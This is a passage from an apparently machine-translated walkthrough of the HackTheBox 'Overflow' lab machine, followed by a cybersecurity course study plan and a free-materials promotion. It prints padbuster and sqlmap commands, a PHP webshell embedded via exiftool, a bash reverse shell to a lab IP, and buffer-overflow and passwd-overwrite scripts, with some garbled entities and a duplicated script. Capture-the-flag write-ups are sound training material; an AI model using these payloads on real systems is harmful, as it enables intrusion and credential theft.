HackTheBox’s Overflow drone

Foreword

This is a difficult target machine. The content of the target machine mainly examines various aspects of web vulnerability exploitation, reverse engineering, permission maintenance, privilege escalation, etc. This target machine is very suitable for entry-level reverse engineering, and it is very helpful in improving penetration thinking. I learned from it. Also benefited a lot.

Problem-solving ideas

image

Information collection

The target machine mainly opens ssh, web and smtp services.

image

After logging in to the web page, I found that there was a registration form. After registering and logging in, I did not find any valuable information.

image

Use the directory fuzz tool to fuzz the directory and find the logs.php file, but it shows that it is not authenticated.

image

image

After finding no other clues, I captured the packet and modified the cookie value, and found a new directory ../logout.php?err=1

image

After jumping to this page, I found that there may be a stuffing attack.

image

Exploitation

padbuster blast

Use padbuster to populate cookies to prompt attack and blast.

padbuster http://overflow.htb/home/index.php cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx 8 -cookies auth=cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx -encoding 0

image

Use the padbuster tool to blast Admin’s cookie value and obtain the cookie value of the admin account.

padbuster http://overflow.htb/home/index.php cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx 8 -cookies auth=cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx -encoding 0 -plaintext="user=Admin"

image

Replace the cookie value of the ordinary account and refresh the page, and find that there is an Admin Panel page.

image

It was found that it is a made simple CMS framework. I found many nDays on EDB, but they are all based on certification.

image

SQL injection

To no avail, when I clicked on the Logs page and viewed the source code, I found a new directory file ../config/admin_last_login.js

image

When accessing this js file, a new url address was found http://overflow.htb/home/logs.php?name=admin

image

The version file was discovered through directory scanning, and the CMS version was found to be 2.2.8. During the EDB search, it was found that there was a SQL injection vulnerability.

image

image.png

Go to SQLMAP directly and find that there is GET type injection.

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA"

image

Inject into the database.

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA" --dbs

image

Inject the cmsmsdb data table and discover the cms_users and cms_siteprefs data tables.

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA" -D cmsmsdb

image.png

The fields of the cms_users data table were injected and the hash values of the admin and editor accounts were found.

image

Next, the salt value needs to be injected. The value exists in the cms_siteprefs table and the salt value 6c2d17f37e226486 is obtained.

image

After getting the salt value, you need to modify the field value corresponding to the EXP before EDB.

image.png

As a result, the explosion of the admin account failed, but the plaintext value of the editor account could be obtained.

image

File upload vulnerability

I used the editor account to log in to the CMS, but I didn’t find anything that could be used successfully. Accidentally found a subdomain name frvbuild-job.overflow.htb

image

After adding it to the hosts file and accessing it, I found another form. You can log in successfully using the editor account.

image

There is an upload point in the user configuration. When trying to upload the PHP webshell, it was found to be filtered.

image

When uploading a normal picture, I found that the output was in the format of exiftool.

image

Try generating a picture horse and utilizing it.

exiftool -DocumentName="<h1>test<br>



<?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd=(\$_REQUEST['cmd']);system(\$cmd);echo '< pre>'}__halt__compiler();?></h1>" webshell.jpg

image

But I found that the image was renamed after it was uploaded, so I couldn’t use it.

image

Finally, it was discovered that the exploit script of the exiftool tool was found on EDB, and the exploit script could also be successfully found on MSF.

image

It should be noted that if you are using the latest kali, the payload needs to be replaced with cmd/unix/reverse_netcat, otherwise the shell cannot be successfully received.

image

image

Elevation of privilege

www-data privilege escalation tester

Uploaded the linpeas.sh script and found a database password.

image

After checking the /etc/passwd file, we found that there is a developer and tester account. You can successfully log in to the developer account using this password.

image

A script commontask.sh was found in the /opt directory, and a non-existent domain name appeared in the script content. taskmanage.overflow.htb. You can try to modify the hosts file and point the domain name to the local IP for Trojan poisoning. The content of the task.sh script is as follows.

bash -i > & amp; /dev/tcp/10.10.14.89/4444 0> & amp;1

image

Start the local http service and receive the shell of the tester account.

image

tester privilege escalation root

Because the obtained shell terminal is unstable, the permissions of the tester user need to be persisted.

image

image

image

image

We can also upload the linpeas.sh script for vulnerability exploration, but here we manually found a file file_encrypt in the /opt/file_encrypt directory. This file has root permissions.

image

Reverse Engineering

Perform reverse engineering analysis on this program and locate the check_pin function. The C pseudocode is as follows.

void check_pin(void)
{
undefined local_2c[20];
int local_18;
long local_14;
int local_10;
\t
local_10 = rand();
local_14 = random();
printf("This is the code: %i, Enter the Pin: ",local_10);
__isoc99_scanf( & amp;DAT_00010d1d, & amp;local_18);
if(local_14 == local_18)
{
printf("name: ");
__isoc99_scanf( & amp;DAT_00010c63, & amp;local_2c);
puts("Thanks for checking.You can give you feedback for improves");
}else{
puts("Wrong Pin");
}
return;
}

image

It is not difficult to see the logic of the code. The value we entered is saved to the variable local_18, and then compared with the variable value of local_14, and the value of local_14 The variable value is generated through the random function. After we locate the random function, the C pseudocode is as follows.

long random(void)
{
unit in_stack_00000004;
uint local_c;
int local_8;
\t
local_c = 0x6b8b4567;
for(local_8 = 0;local_8 < 10;local_8=local_8 + 1)
{
local_c = local_c * 0x59 + 0x14;
}
return local_c ^ in_stack_00000004;
}

image

Use gdb to view the program and find that the program finally performs an XOR operation and the program starts from the address 0x6b8b4567.

image

image

After figuring out the program, you can write an exploit script. Run the following script to get the PIN value -202976456

#!/usr/bin/python3
import ctypes
local_c_initial = 0x6b8b4567
local_c = 0x6b8b4567
local_8 = 0
while (local_8 <10):
local_c = local_c * 0x59 + 0x14
local_8 = local_8 + 1

PIN = ctypes.c_int(local_c ^ local_c_initial).value
print(“The PIN code is: “, PIN)

Buffer overflow vulnerability

Enter a large number of characters to check for possible buffer overflow.

image

image

Use msf-pattern_offset to identify an overflow offset at 44.

image

Then you can use a period of characters to fill the EIP register to achieve overflow.

python3 -c "print('\x41'*44 + '\x5b\x58\x55\x56')"

image

Then a new idea emerged, which is to copy the passwd file and fill in the new account fields into the original passwd file through this vulnerability.

#!/usr/bin/python3

source = open('/tmp/passwd','rb').read()
dest = open('tmp/passwd2','wb')

for i in source:
    dest.write(bytes([i^0x9b]))

image

image

, through this vulnerability, the new account field is overflowed into the original passwd file.

#!/usr/bin/python3

source = open('/tmp/passwd','rb').read()
dest = open('tmp/passwd2','wb')

for i in source:
    dest.write(bytes([i^0x9b]))

[External link pictures are being transferred…(img-uXK1kpwG-1697854001044)]

[External link pictures are being transferred…(img-df9wk3Hr-1697854001045)]

Next, I will divide a study plan for each student!

Study plan

So the question comes again, as a newbie, what should I learn first and what should I learn next?
Since you have asked so straightforwardly, I will tell you what you should start learning from scratch:

Phase 1: Junior Network Security Engineer

Next, I will arrange a one-month basic network security plan for you. After you finish the course, you can basically work in a network security-related job, such as penetration testing, Web penetration, security services, security analysis, etc. ;Among them, if you learn the class guarantee module well, you can also work as a class guarantee engineer.

Comprehensive salary range 6k~15k

1. Network security theoretical knowledge (2 days)
① Understand the relevant background and prospects of the industry and determine the development direction.
②Learn laws and regulations related to network security.
③The concept of network security operations.
④Introduction to MLPS, regulations, processes and specifications for MLPS. (Very important)

2. Penetration testing basics (1 week)
①Penetration testing process, classification and standards
②Information collection technology: active/passive information collection, Nmap tool, Google Hacking
③Vulnerability scanning, vulnerability exploitation, principles, utilization methods, tools (MSF), bypassing IDS and anti-virus reconnaissance
④Host attack and defense drills: MS17-010, MS08-067, MS10-046, MS12-20, etc.

3. Operating system basics (1 week)
①Common functions and commands of Windows system
②Common functions and commands of Kali Linux system
③Operating system security (system intrusion investigation/system reinforcement basis)

4. Computer network basics (1 week)
①Computer network basics, protocols and architecture
②Network communication principles, OSI model, data forwarding process
③Common protocol analysis (HTTP, TCP/IP, ARP, etc.)
④Network attack technology and network security defense technology
⑤Web vulnerability principles and defense: active/passive attacks, DDOS attacks, CVE vulnerability recurrence

5. Basic database operations (2 days)
①Database basics
②SQL language basics
③Database security reinforcement

6. Web penetration (1 week)
①Introduction to HTML, CSS and JavaScript
②OWASP Top10
③Web vulnerability scanning tool
④Web penetration tools: Nmap, BurpSuite, SQLMap, others (Chopper, Miss Scan, etc.)

So, it has taken about a month so far. You have successfully become a “script kiddie”. So do you still want to continue exploring?

Stage 2: Intermediate or senior network security engineer (depending on your ability)

Comprehensive salary range 15k~30k

7. Script programming learning (4 weeks)
in the field of cybersecurity. The ability to program is the essential difference between a “script kiddie” and a true network security engineer. In the actual penetration testing process, in the face of complex and changeable network environments, when commonly used tools cannot meet actual needs, it is often necessary to expand existing tools, or write tools and automated scripts that meet our requirements. At this time, Requires certain programming skills. In the CTF competition, where every second counts, if you want to effectively use homemade script tools to achieve various purposes, you need to have programming skills.

For students who are starting from scratch, I suggest you choose one of the scripting languages Python/PHP/Go/Java and learn to program common libraries.
Set up a development environment and choose an IDE. Wamp and XAMPP are recommended for PHP environments, and Sublime is highly recommended for IDEs;

Learn Python programming. The learning content includes: grammar, regularity, files, networks, multi-threading and other common libraries. We recommend “Python Core Programming”. There is no need to read it all.

Use Python to write exploits for vulnerabilities, and then write a simple web crawler

Learn basic PHP syntax and write a simple blog system

Be familiar with the MVC architecture and try to learn a PHP framework or Python framework (optional)

Understand Bootstrap layout or CSS.

Phase 3: Top Network Security Engineer

If you are interested in getting started with network security, you can click here if you need it Big benefits of network security: Getting started & advanced full set of 282G learning resource package to share for free!

Sharing learning materials

Of course, giving only plans but not learning materials is tantamount to being a hooligan. Here is a [282G] learning material package for network security engineers from entry to proficiency. You can click on the two below Get the QR code link.